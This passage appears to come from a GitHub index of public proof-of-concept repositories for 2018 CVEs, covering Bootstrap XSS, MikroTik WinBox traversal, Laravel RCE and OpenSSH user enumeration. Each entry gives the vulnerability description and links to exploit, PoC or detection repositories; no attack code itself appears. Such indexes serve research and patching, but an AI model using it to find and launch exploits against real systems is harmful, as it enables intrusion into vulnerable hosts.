The macaddress module before 0.2.9 for Node.js is prone to an arbitrary command injection flaw, due to allowing unsanitized input to an exec (rather than execFile) call.

- [dsp-testing/CVE-2018-13797](https://github.com/dsp-testing/CVE-2018-13797)

### CVE-2018-13864 (2018-07-17)

A directory traversal vulnerability has been found in the Assets controller in Play Framework 2.6.12 through 2.6.15 (fixed in 2.6.16) when running on Windows. It allows a remote attacker to download arbitrary files from the target server via specially crafted HTTP requests.

- [tafamace/CVE-2018-13864](https://github.com/tafamace/CVE-2018-13864)

### CVE-2018-14009 (2018-07-12)

Codiad through 2.8.4 allows Remote Code Execution, a different vulnerability than CVE-2017-11366 and CVE-2017-15689.

- [hidog123/Codiad-CVE-2018-14009](https://github.com/hidog123/Codiad-CVE-2018-14009)

### CVE-2018-14040 (2018-07-13)

In Bootstrap before 4.1.2, XSS is possible in the collapse data-parent attribute.

- [Snorlyd/https-nj.gov---CVE-2018-14040](https://github.com/Snorlyd/https-nj.gov---CVE-2018-14040)

### CVE-2018-14041 (2018-07-13)

In Bootstrap before 4.1.2, XSS is possible in the data-target property of scrollspy.

- [Snorlyd/https-nj.gov---CVE-2018-14041](https://github.com/Snorlyd/https-nj.gov---CVE-2018-14041)

### CVE-2018-14042 (2018-07-13)

In Bootstrap before 4.1.2, XSS is possible in the data-container property of tooltip.

- [Snorlyd/https-nj.gov---CVE-2018-14042](https://github.com/Snorlyd/https-nj.gov---CVE-2018-14042)

### CVE-2018-14083 (2018-07-25)

LICA miniCMTS E8K(u/i/...) devices allow remote attackers to obtain sensitive information via a direct POST request for the inc/user.ini file, leading to discovery of a password hash.

- [pudding2/CVE-2018-14083](https://github.com/pudding2/CVE-2018-14083)

### CVE-2018-14442 (2018-07-20)

Foxit Reader before 9.2 and PhantomPDF before 9.2 have a Use-After-Free that leads to Remote Code Execution, aka V-88f4smlocs.

- [payatu/CVE-2018-14442](https://github.com/payatu/CVE-2018-14442)
- [sharmasandeepkr/PS-2018-002---CVE-2018-14442](https://github.com/sharmasandeepkr/PS-2018-002---CVE-2018-14442)

### CVE-2018-14463 (2019-10-03)

The VRRP parser in tcpdump before 4.9.3 has a buffer over-read in print-vrrp.c:vrrp_print() for VRRP version 2, a different vulnerability than CVE-2019-15167.

- [hshivhare67/platform_external_tcpdump_AOSP10_r33_4.9.2-_CVE-2018-14463](https://github.com/hshivhare67/platform_external_tcpdump_AOSP10_r33_4.9.2-_CVE-2018-14463)

### CVE-2018-14469 (2019-10-03)

The IKEv1 parser in tcpdump before 4.9.3 has a buffer over-read in print-isakmp.c:ikev1_n_print().

- [Trinadh465/external_tcpdump_CVE-2018-14469](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14469)

### CVE-2018-14634 (2018-09-25)

An integer overflow flaw was found in the Linux kernel's create_elf_tables() function. An unprivileged local user with access to a SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system. Kernel versions 2.6.x, 3.10.x and 4.14.x are believed to be vulnerable.

- [luan0ap/cve-2018-14634](https://github.com/luan0ap/cve-2018-14634)

### CVE-2018-14665 (2018-10-25)

A flaw was found in xorg-x11-server before 1.20.3: an incorrect permission check for the -modulepath and -logfile options when starting Xorg. The X server allows unprivileged users with the ability to log in to the system via the physical console to escalate their privileges and run arbitrary code under root privileges.

- [jas502n/CVE-2018-14665](https://github.com/jas502n/CVE-2018-14665)
- [bolonobolo/CVE-2018-14665](https://github.com/bolonobolo/CVE-2018-14665)

### CVE-2018-14667 (2018-11-06)

The RichFaces Framework 3.X through 3.3.4 is vulnerable to Expression Language (EL) injection via the UserResource resource. A remote, unauthenticated attacker could exploit this to execute arbitrary code using a chain of java serialized objects via org.ajax4jsf.resource.UserResource$UriData.

- [nareshmail/cve-2018-14667](https://github.com/nareshmail/cve-2018-14667)
- [zeroto01/CVE-2018-14667](https://github.com/zeroto01/CVE-2018-14667)
- [r00t4dm/CVE-2018-14667](https://github.com/r00t4dm/CVE-2018-14667)
- [syriusbughunt/CVE-2018-14667](https://github.com/syriusbughunt/CVE-2018-14667)
- [quandqn/cve-2018-14667](https://github.com/quandqn/cve-2018-14667)
- [Venscor/CVE-2018-14667-poc](https://github.com/Venscor/CVE-2018-14667-poc)

### CVE-2018-14699 (2018-12-03)

System command injection in the /DroboAccess/enable_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to execute system commands via the "username" URL parameter.

- [RevoCain/CVE-2018-14699](https://github.com/RevoCain/CVE-2018-14699)

### CVE-2018-14714 (2019-05-13)

System command injection in appGet.cgi on ASUS RT-AC3200 version 3.0.0.4.382.50010 allows attackers to execute system commands via the "load_script" URL parameter.

- [tin-z/CVE-2018-14714-POC](https://github.com/tin-z/CVE-2018-14714-POC)
- [sunn1day/CVE-2018-14714-POC](https://github.com/sunn1day/CVE-2018-14714-POC)
- [BTtea/CVE-2018-14714-RCE-exploit](https://github.com/BTtea/CVE-2018-14714-RCE-exploit)

### CVE-2018-14716 (2018-08-06)

A Server Side Template Injection (SSTI) was discovered in the SEOmatic plugin before 3.1.4 for Craft CMS, because requests that don't match any elements incorrectly generate the canonicalUrl, and can lead to execution of Twig code.

- [0xB455/CVE-2018-14716](https://github.com/0xB455/CVE-2018-14716)

### CVE-2018-14729 (2019-05-22)

The database backup feature in upload/source/admincp/admincp_db.php in Discuz! 2.5 and 3.4 allows remote attackers to execute arbitrary PHP code.

- [c0010/CVE-2018-14729](https://github.com/c0010/CVE-2018-14729)

### CVE-2018-14772 (2018-10-16)

Pydio 4.2.1 through 8.2.1 has an authenticated remote code execution vulnerability in which an attacker with administrator access to the web application can execute arbitrary code on the underlying system via Command Injection.

- [killvxk/CVE-2018-14772](https://github.com/killvxk/CVE-2018-14772)

### CVE-2018-14847 (2018-08-02)

MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.

- [BasuCert/WinboxPoC](https://github.com/BasuCert/WinboxPoC)
- [msterusky/WinboxExploit](https://github.com/msterusky/WinboxExploit)
- [syrex1013/MikroRoot](https://github.com/syrex1013/MikroRoot)
- [jas502n/CVE-2018-14847](https://github.com/jas502n/CVE-2018-14847)
- [mahmoodsabir/mikrotik-beast](https://github.com/mahmoodsabir/mikrotik-beast)
- [Tr33-He11/winboxPOC](https://github.com/Tr33-He11/winboxPOC)
- [sinichi449/Python-MikrotikLoginExploit](https://github.com/sinichi449/Python-MikrotikLoginExploit)
- [yukar1z0e/CVE-2018-14847](https://github.com/yukar1z0e/CVE-2018-14847)
- [hacker30468/Mikrotik-router-hack](https://github.com/hacker30468/Mikrotik-router-hack)
- [babyshen/routeros-CVE-2018-14847-bytheway](https://github.com/babyshen/routeros-CVE-2018-14847-bytheway)
- [K3ysTr0K3R/CVE-2018-14847-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2018-14847-EXPLOIT)

### CVE-2018-14879 (2019-10-03)

The command-line argument parser in tcpdump before 4.9.3 has a buffer overflow in tcpdump.c:get_next_file().

- [Trinadh465/external_tcpdump_CVE-2018-14879](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14879)

### CVE-2018-14880 (2019-10-03)

The OSPFv3 parser in tcpdump before 4.9.3 has a buffer over-read in print-ospf6.c:ospf6_print_lshdr().

- [Trinadh465/external_tcpdump_CVE-2018-14880](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14880)

### CVE-2018-15131 (2019-05-30)

An issue was discovered in Synacor Zimbra Collaboration Suite 8.6.x before 8.6.0 Patch 11, 8.7.x before 8.7.11 Patch 6, 8.8.x before 8.8.8 Patch 9, and 8.8.9 before 8.8.9 Patch 3. Account number enumeration is possible via inconsistent responses for specific types of authentication requests.

- [0x00-0x00/CVE-2018-15131](https://github.com/0x00-0x00/CVE-2018-15131)

### CVE-2018-15133 (2018-08-09)

In Laravel Framework through 5.5.40 and 5.6.x through 5.6.29, remote code execution might occur as a result of an unserialize call on a potentially untrusted X-XSRF-TOKEN value. This involves the decrypt method in Illuminate/Encryption/Encrypter.php and PendingBroadcast in gadgetchains/Laravel/RCE/3/chain.php in phpggc. The attacker must know the application key, which normally would never occur, but could happen if the attacker previously had privileged access or successfully accomplished a previous attack.

- [kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)
- [Bilelxdz/Laravel-CVE-2018-15133](https://github.com/Bilelxdz/Laravel-CVE-2018-15133)
- [Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader](https://github.com/Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader)
- [bukitbarisan/laravel-rce-cve-2018-15133](https://github.com/bukitbarisan/laravel-rce-cve-2018-15133)
- [AlienX2001/better-poc-for-CVE-2018-15133](https://github.com/AlienX2001/better-poc-for-CVE-2018-15133)
- [aljavier/exploit_laravel_cve-2018-15133](https://github.com/aljavier/exploit_laravel_cve-2018-15133)
- [pwnedshell/Larascript](https://github.com/pwnedshell/Larascript)
- [AzhariKun/CVE-2018-15133](https://github.com/AzhariKun/CVE-2018-15133)
- [NatteeSetobol/CVE-2018-15133-Lavel-Expliot](https://github.com/NatteeSetobol/CVE-2018-15133-Lavel-Expliot)
- [Cr4zyD14m0nd137/Lab-for-cve-2018-15133](https://github.com/Cr4zyD14m0nd137/Lab-for-cve-2018-15133)
- [0xSalle/cve-2018-15133](https://github.com/0xSalle/cve-2018-15133)

### CVE-2018-15139 (2018-08-13)

Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.

- [sec-it/exploit-CVE-2018-15139](https://github.com/sec-it/exploit-CVE-2018-15139)

### CVE-2018-15365 (2018-09-28)

A Reflected Cross-Site Scripting (XSS) vulnerability in Trend Micro Deep Discovery Inspector 3.85 and below could allow an attacker to bypass CSRF protection and conduct an attack on vulnerable installations. An attacker must be an authenticated user in order to exploit the vulnerability.

- [nixwizard/CVE-2018-15365](https://github.com/nixwizard/CVE-2018-15365)

### CVE-2018-15473 (2018-08-17)

OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

- [trimstray/massh-enum](https://github.com/trimstray/massh-enum)
- [gbonacini/opensshenum](https://github.com/gbonacini/opensshenum)
- [Rhynorater/CVE-2018-15473-Exploit](https://github.com/Rhynorater/CVE-2018-15473-Exploit)
- [epi052/cve-2018-15473](https://github.com/epi052/cve-2018-15473)
- [pyperanger/CVE-2018-15473_exploit](https://github.com/pyperanger/CVE-2018-15473_exploit)
- [r3dxpl0it/CVE-2018-15473](https://github.com/r3dxpl0it/CVE-2018-15473)
- [JoeBlackSecurity/SSHUsernameBruter-SSHUB](https://github.com/JoeBlackSecurity/SSHUsernameBruter-SSHUB)
- [cved-sources/cve-2018-15473](https://github.com/cved-sources/cve-2018-15473)
- [LINYIKAI/CVE-2018-15473-exp](https://github.com/LINYIKAI/CVE-2018-15473-exp)
- [trickster1103/-](https://github.com/trickster1103/-)
- [NHPT/SSH-account-enumeration-verification-script](https://github.com/NHPT/SSH-account-enumeration-verification-script)
- [CaioCGH/EP4-redes](https://github.com/CaioCGH/EP4-redes)
- [Moon1705/easy_security](https://github.com/Moon1705/easy_security)
- [An0nYm0u5101/enumpossible](https://github.com/An0nYm0u5101/enumpossible)
- [Wh1t3Fox/cve-2018-15473](https://github.com/Wh1t3Fox/cve-2018-15473)
- [1stPeak/CVE-2018-15473](https://github.com/1stPeak/CVE-2018-15473)
- [coollce/CVE-2018-15473_burte](https://github.com/coollce/CVE-2018-15473_burte)
- [Dirty-Racoon/CVE-2018-15473-py3](https://github.com/Dirty-Racoon/CVE-2018-15473-py3)
- [Sait-Nuri/CVE-2018-15473](https://github.com/Sait-Nuri/CVE-2018-15473)
- [WildfootW/CVE-2018-15473_OpenSSH_7.7](https://github.com/WildfootW/CVE-2018-15473_OpenSSH_7.7)
- [MrDottt/CVE-2018-15473](https://github.com/MrDottt/CVE-2018-15473)
- [66quentin/shodan-CVE-2018-15473](https://github.com/66quentin/shodan-CVE-2018-15473)
- [0xrobiul/CVE-2018-15473](https://github.com/0xrobiul/CVE-2018-15473)
- [philippedixon/CVE-2018-15473](https://github.com/philippedixon/CVE-2018-15473)
- [sergiovks/SSH-User-Enum-Python3-CVE-2018-15473](https://github.com/sergiovks/SSH-User-Enum-Python3-CVE-2018-15473)
- [Anonimo501/ssh_enum_users_CVE-2018-15473](https://github.com/Anonimo501/ssh_enum_users_CVE-2018-15473)
- [mclbn/docker-cve-2018-15473](https://github.com/mclbn/docker-cve-2018-15473)
- [GaboLC98/userenum-CVE-2018-15473](https://github.com/GaboLC98/userenum-CVE-2018-15473)
- [4xolotl/CVE-2018-15473](https://github.com/4xolotl/CVE-2018-15473)
- [NestyF/SSH_Enum_CVE-2018-15473](https://github.com/NestyF/SSH_Enum_CVE-2018-15473)
- [yZ1337/CVE-2018-15473](https://github.com/yZ1337/CVE-2018-15473)
- [MahdiOsman/CVE-2018-15473-SNMPv1-2-Community-String-Vulnerability-Testing](https://github.com/MahdiOsman/CVE-2018-15473-SNMPv1-2-Community-String-Vulnerability-Testing)

### CVE-2018-15499 (2018-08-24)

GEAR Software products that include GEARAspiWDM.sys, 2.2.5.0, allow local users to cause a denial of service (Race Condition and BSoD on Windows) by not checking that user-mode memory is available right before writing to it. A check is only performed at the beginning of a long subroutine.

- [DownWithUp/CVE-2018-15499](https://github.com/DownWithUp/CVE-2018-15499)

### CVE-2018-15686 (2018-10-26)

A vulnerability in unit_deserialize of systemd allows an attacker to supply arbitrary state across systemd re-execution via NotifyAccess. This can be used to improperly influence systemd execution and possibly lead to root privilege escalation. Affected releases are systemd versions up to and including 239.

- [hpcprofessional/remediate_cesa_2019_2091](https://github.com/hpcprofessional/remediate_cesa_2019_2091)

### CVE-2018-15708 (2018-11-14)

Snoopy 1.0 in Nagios XI 5.5.6 allows remote unauthenticated attackers to execute arbitrary commands via a crafted HTTP request.

- [lkduy2602/Detecting-CVE-2018-15708-Vulnerabilities](https://github.com/lkduy2602/Detecting-CVE-2018-15708-Vulnerabilities)

### CVE-2018-15727 (2018-08-29)

Grafana 2.x, 3.x, and 4.x before 4.6.4 and 5.x before 5.2.3 allows authentication bypass because an attacker can generate a valid "remember me" cookie knowing only a username of an LDAP or OAuth user.

- [u238/grafana-CVE-2018-15727](https://github.com/u238/grafana-CVE-2018-15727)
- [grimbelhax/CVE-2018-15727](https://github.com/grimbelhax/CVE-2018-15727)

### CVE-2018-15832 (2018-09-20)

upc.exe in Ubisoft Uplay Desktop Client version 63.0.5699.0 allows remote attackers to execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of URI handlers. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code under the context of the current process.

- [JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0](https://github.com/JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0)

### CVE-2018-15835 (2018-11-30)

Android 1.0 through 9.0 has Insecure Permissions. The Android bug ID is 77286983.

- [Chirantar7004/Android-Passive-Location-Tracker](https://github.com/Chirantar7004/Android-Passive-Location-Tracker)

### CVE-2018-15877 (2018-08-26)

The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request.

- [cved-sources/cve-2018-15877](https://github.com/cved-sources/cve-2018-15877)
- [Cinnamon1212/CVE-2018-15877-RCE](https://github.com/Cinnamon1212/CVE-2018-15877-RCE)

### CVE-2018-15912 (2018-08-29)

An issue was discovered in manjaro-update-system.sh in manjaro-system 20180716-1 on Manjaro Linux. A local attacker can install or remove arbitrary packages and package repositories potentially containing hooks with arbitrary code, which will automatically be run as root, or remove packages vital to the system.

- [coderobe/CVE-2018-15912-PoC](https://github.com/coderobe/CVE-2018-15912-PoC)

### CVE-2018-15961 (2018-09-25)

Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.

- [vah13/CVE-2018-15961](https://github.com/vah13/CVE-2018-15961)
- [cved-sources/cve-2018-15961](https://github.com/cved-sources/cve-2018-15961)
- [xbufu/CVE-2018-15961](https://github.com/xbufu/CVE-2018-15961)
- [orangmuda/CVE-2018-15961](https://github.com/orangmuda/CVE-2018-15961)
- [bu1xuan2/CVE-2018-15961](https://github.com/bu1xuan2/CVE-2018-15961)

### CVE-2018-15968 (2018-10-12)

Adobe Acrobat and Reader versions 2018.011.20063 and earlier, 2017.011.30102 and earlier, and 2015.006.30452 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.

- [sharmasandeepkr/cve-2018-15968](https://github.com/sharmasandeepkr/cve-2018-15968)

### CVE-2018-15982 (2019-01-18)

Flash Player versions 31.0.0.153 and earlier, and 31.0.0.108 and earlier have a use after free vulnerability. Successful exploitation could lead to arbitrary code execution.

- [FlatL1neAPT/CVE-2018-15982](https://github.com/FlatL1neAPT/CVE-2018-15982)
- [Ormicron/CVE-2018-15982_PoC](https://github.com/Ormicron/CVE-2018-15982_PoC)
- [Ridter/CVE-2018-15982_EXP](https://github.com/Ridter/CVE-2018-15982_EXP)
- [kphongagsorn/adobe-flash-cve2018-15982](https://github.com/kphongagsorn/adobe-flash-cve2018-15982)
- [jas502n/CVE-2018-15982_EXP_IE](https://github.com/jas502n/CVE-2018-15982_EXP_IE)
- [scanfsec/CVE-2018-15982](https://github.com/scanfsec/CVE-2018-15982)
- [SyFi/CVE-2018-15982](https://github.com/SyFi/CVE-2018-15982)
- [create12138/CVE-2018-15982](https://github.com/create12138/CVE-2018-15982)

### CVE-2018-16119 (2019-06-20)

Stack-based buffer overflow in the httpd server of TP-Link WR1043nd (Firmware Version 3) allows remote attackers to execute arbitrary code via a malicious MediaServer request to /userRpm/MediaServerFoldersCfgRpm.htm.

- [hdbreaker/CVE-2018-16119](https://github.com/hdbreaker/CVE-2018-16119)

### CVE-2018-16156 (2019-05-17)

In PaperStream IP (TWAIN) 1.42.0.5685 (Service Update 7), the FJTWSVIC service running with SYSTEM privilege processes unauthenticated messages received over the FjtwMkic_Fjicube_32 named pipe. One of these message processing functions attempts to dynamically load the UninOldIS.dll library and executes an exported function named ChangeUninstallString. The default install does not contain this library and therefore if any DLL with that name exists in any directory listed in the PATH variable, it can be used to escalate to SYSTEM level privilege.

- [securifera/CVE-2018-16156-Exploit](https://github.com/securifera/CVE-2018-16156-Exploit)

### CVE-2018-16167 (2019-01-09)

LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.

- [dnr6419/CVE-2018-16167](https://github.com/dnr6419/CVE-2018-16167)

### CVE-2018-16283 (2018-09-24)

The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter.

- [cved-sources/cve-2018-16283](https://github.com/cved-sources/cve-2018-16283)

### CVE-2018-16323 (2018-09-01)

ReadXBMImage in coders/xbm.c in ImageMagick before 7.0.8-9 leaves data uninitialized when processing an XBM file that has a negative pixel value. If the affected code is used as a library loaded into a process that includes sensitive information, that information sometimes can be leaked via the image data.

- [ttffdd/XBadManners](https://github.com/ttffdd/XBadManners)

### CVE-2018-16341
- [mpgn/CVE-2018-16341](https://github.com/mpgn/CVE-2018-16341)
- [CN016/Nuxeo-CVE-2018-16341](https://github.com/CN016/Nuxeo-CVE-2018-16341)

### CVE-2018-16370 (2018-09-03)

In PESCMS Team 2.2.1, attackers may upload and execute arbitrary PHP code through /Public/?g=Team&m=Setting&a=upgrade by placing a .php file in a ZIP archive.

- [snappyJack/CVE-2018-16370](https://github.com/snappyJack/CVE-2018-16370)

### CVE-2018-16373 (2018-09-03)

Frog CMS 0.9.5 has an Upload vulnerability that can create files via /admin/?/plugin/file_manager/save.

- [snappyJack/CVE-2018-16373](https://github.com/snappyJack/CVE-2018-16373)

### CVE-2018-16431 (2018-09-04)

admin/admin/adminsave.html in YFCMF v3.0 allows CSRF to add an administrator account.

- [RHYru9/CVE-2018-16431](https://github.com/RHYru9/CVE-2018-16431)

### CVE-2018-16492 (2019-02-01)

A prototype pollution vulnerability was found in module extend <2.0.2, ~<3.0.2 that allows an attacker to inject arbitrary properties onto Object.prototype.

- [dsp-testing/CVE-2018-16492](https://github.com/dsp-testing/CVE-2018-16492)

### CVE-2018-16509 (2018-09-05)

An issue was discovered in Artifex Ghostscript before 9.24. Incorrect "restoration of privilege" checking during handling of /invalidaccess exceptions could be used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction.

- [farisv/PIL-RCE-Ghostscript-CVE-2018-16509](https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509)
- [knqyf263/CVE-2018-16509](https://github.com/knqyf263/CVE-2018-16509)
- [cved-sources/cve-2018-16509](https://github.com/cved-sources/cve-2018-16509)
- [rhpco/CVE-2018-16509](https://github.com/rhpco/CVE-2018-16509)

### CVE-2018-16706 (2018-09-14)

LG SuperSign CMS allows TVs to be rebooted remotely without authentication via a direct HTTP request to /qsr_server/device/reboot on port 9080.

- [Nurdilin/CVE-2018-16706](https://github.com/Nurdilin/CVE-2018-16706)

### CVE-2018-16711 (2018-09-26)

IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send an IOCTL (0x9C402088) with a buffer containing user defined content. The driver's subroutine will execute a wrmsr instruction with the user's buffer for input.

- [DownWithUp/CVE-2018-16711](https://github.com/DownWithUp/CVE-2018-16711)

### CVE-2018-16712 (2018-09-26)

IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send a specially crafted IOCTL 0x9C406104 to read physical memory.

- [DownWithUp/CVE-2018-16712](https://github.com/DownWithUp/CVE-2018-16712)

### CVE-2018-16713 (2018-09-26)

IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send an IOCTL (0x9C402084) with a buffer containing user defined content. The driver's subroutine will execute a rdmsr instruction with the user's buffer for input, and provide output from the instruction.

- [DownWithUp/CVE-2018-16713](https://github.com/DownWithUp/CVE-2018-16713)

### CVE-2018-16763 (2018-09-09)

FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.

- [dinhbaouit/CVE-2018-16763](https://github.com/dinhbaouit/CVE-2018-16763)
- [hikarihacks/CVE-2018-16763-exploit](https://github.com/hikarihacks/CVE-2018-16763-exploit)
- [n3m1sys/CVE-2018-16763-Exploit-Python3](https://github.com/n3m1sys/CVE-2018-16763-Exploit-Python3)
- [uwueviee/Fu3l-F1lt3r](https://github.com/uwueviee/Fu3l-F1lt3r)
- [shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--](https://github.com/shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--)
- [kxisxr/Bash-Script-CVE-2018-16763](https://github.com/kxisxr/Bash-Script-CVE-2018-16763)
- [padsalatushal/CVE-2018-16763](https://github.com/padsalatushal/CVE-2018-16763)
- [wizardy0ga/THM-Vulnerability_Capstone-CVE-2018-16763](https://github.com/wizardy0ga/THM-Vulnerability_Capstone-CVE-2018-16763)
- [h3xcr4ck3r/CVE-2018-16763](https://github.com/h3xcr4ck3r/CVE-2018-16763)
- [BrunoPincho/cve-2018-16763-rust](https://github.com/BrunoPincho/cve-2018-16763-rust)
- [p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE)
- [not1cyyy/CVE-2018-16763](https://github.com/not1cyyy/CVE-2018-16763)
- [antisecc/CVE-2018-16763](https://github.com/antisecc/CVE-2018-16763)
- [VitoBonetti/CVE-2018-16763](https://github.com/VitoBonetti/CVE-2018-16763)

### CVE-2018-16809 (2019-03-07)

An issue was discovered in Dolibarr through 7.0.0. expensereport/card.php in the expense reports module allows SQL injection via the integer parameters qty and value_unit.

- [elkassimyhajar/CVE-2018-16809](https://github.com/elkassimyhajar/CVE-2018-16809)

### CVE-2018-16843 (2018-11-07)

nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.

- [flyniu666/ingress-nginx-0.21-1.19.5](https://github.com/flyniu666/ingress-nginx-0.21-1.19.5)

### CVE-2018-16854 (2018-11-26)

A flaw was found in moodle versions 3.5 to 3.5.2, 3.4 to 3.4.5, 3.3 to 3.3.8, 3.1 to 3.1.14 and earlier. The login form is not protected by a token to prevent login cross-site request forgery. Fixed versions include 3.6, 3.5.3, 3.4.6, 3.3.9 and 3.1.15.

- [danielthatcher/moodle-login-csrf](https://github.com/danielthatcher/moodle-login-csrf)

### CVE-2018-16858 (2019-03-25)

It was found that libreoffice before versions 6.0.7 and 6.1.3 was vulnerable to a directory traversal attack which could be used to execute arbitrary macros bundled with a document. An attacker could craft a document, which when opened by LibreOffice, would execute a Python method from a script in any arbitrary file system location, specified relative to the LibreOffice install location.

- [4nimanegra/libreofficeExploit1](https://github.com/4nimanegra/libreofficeExploit1)
- [phongld97/detect-cve-2018-16858](https://github.com/phongld97/detect-cve-2018-16858)
- [bantu2301/CVE-2018-16858](https://github.com/bantu2301/CVE-2018-16858)
- [Henryisnotavailable/CVE-2018-16858-Python](https://github.com/Henryisnotavailable/CVE-2018-16858-Python)

### CVE-2018-16875 (2018-12-14)

The crypto/x509 package of Go before 1.10.6 and 1.11.x before 1.11.3 does not limit the amount of work performed for each chain verification, which might allow attackers to craft pathological inputs leading to a CPU denial of service. Go TLS servers accepting client certificates and TLS clients are affected.

- [alexzorin/poc-cve-2018-16875](https://github.com/alexzorin/poc-cve-2018-16875)

### CVE-2018-16890 (2019-02-06)

libcurl versions from 7.36.0 to before 7.64.0 are vulnerable to a heap buffer out-of-bounds read. The function handling incoming NTLM type-2 messages (`lib/vauth/ntlm.c:ntlm_decode_type2_target`) does not validate incoming data correctly and is subject to an integer overflow vulnerability. Using that overflow, a malicious or broken NTLM server could trick libcurl into accepting a bad length + offset combination that leads to a buffer read out-of-bounds.

- [michelleamesquita/CVE-2018-16890](https://github.com/michelleamesquita/CVE-2018-16890)

### CVE-2018-16987 (2018-09-13)

Squash TM through 1.18.0 presents the cleartext passwords of external services in the administration panel, as demonstrated by a ta-server-password field in the HTML source code.

- [gquere/CVE-2018-16987](https://github.com/gquere/CVE-2018-16987)

### CVE-2018-17081 (2018-09-26)

e107 2.1.9 allows CSRF via e107_admin/wmessage.php?mode=&action=inline&ajax_used=1&id= for changing the title of an arbitrary page.

- [himanshurahi/e107_2.1.9_CSRF_POC](https://github.com/himanshurahi/e107_2.1.9_CSRF_POC)

### CVE-2018-17144 (2018-09-19)

Bitcoin Core 0.14.x before 0.14.3, 0.15.x before 0.15.2, and 0.16.x before 0.16.3 and Bitcoin Knots 0.14.x through 0.16.x before 0.16.3 allow a remote denial of service (application crash) exploitable by miners via duplicate input. An attacker can make bitcoind or Bitcoin-Qt crash.

- [iioch/ban-exploitable-bitcoin-nodes](https://github.com/iioch/ban-exploitable-bitcoin-nodes)
- [hikame/CVE-2018-17144_POC](https://github.com/hikame/CVE-2018-17144_POC)

### CVE-2018-17182 (2018-09-19)

An issue was discovered in the Linux kernel through 4.18.8. The vmacache_flush_all function in mm/vmacache.c mishandles sequence number overflows. An attacker can trigger a use-after-free (and possibly gain privileges) via certain thread creation, map, unmap, invalidation, and dereference operations.

- [jas502n/CVE-2018-17182](https://github.com/jas502n/CVE-2018-17182)
- [likekabin/CVE-2018-17182](https://github.com/likekabin/CVE-2018-17182)
- [likekabin/vmacache_CVE-2018-17182](https://github.com/likekabin/vmacache_CVE-2018-17182)
- [jedai47/cve-2018-17182](https://github.com/jedai47/cve-2018-17182)

### CVE-2018-17207 (2018-09-19)

An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.

- [cved-sources/cve-2018-17207](https://github.com/cved-sources/cve-2018-17207)

### CVE-2018-17240 (2022-06-10)

There is a memory dump vulnerability on Netwave IP camera devices at //proc/kcore that allows an unauthenticated attacker to exfiltrate sensitive information from the network configuration (e.g., username and password).

- [BBge/CVE-2018-17240](https://github.com/BBge/CVE-2018-17240)
- [Xewdy444/Netgrave](https://github.com/Xewdy444/Netgrave)

### CVE-2018-17246 (2018-12-20)

Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

- [mpgn/CVE-2018-17246](https://github.com/mpgn/CVE-2018-17246)

### CVE-2018-17254 (2018-09-20)

The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.

- [Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection](https://github.com/Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection)
- [MataKucing-OFC/CVE-2018-17254](https://github.com/MataKucing-OFC/CVE-2018-17254)

### CVE-2018-17418 (2019-03-07)

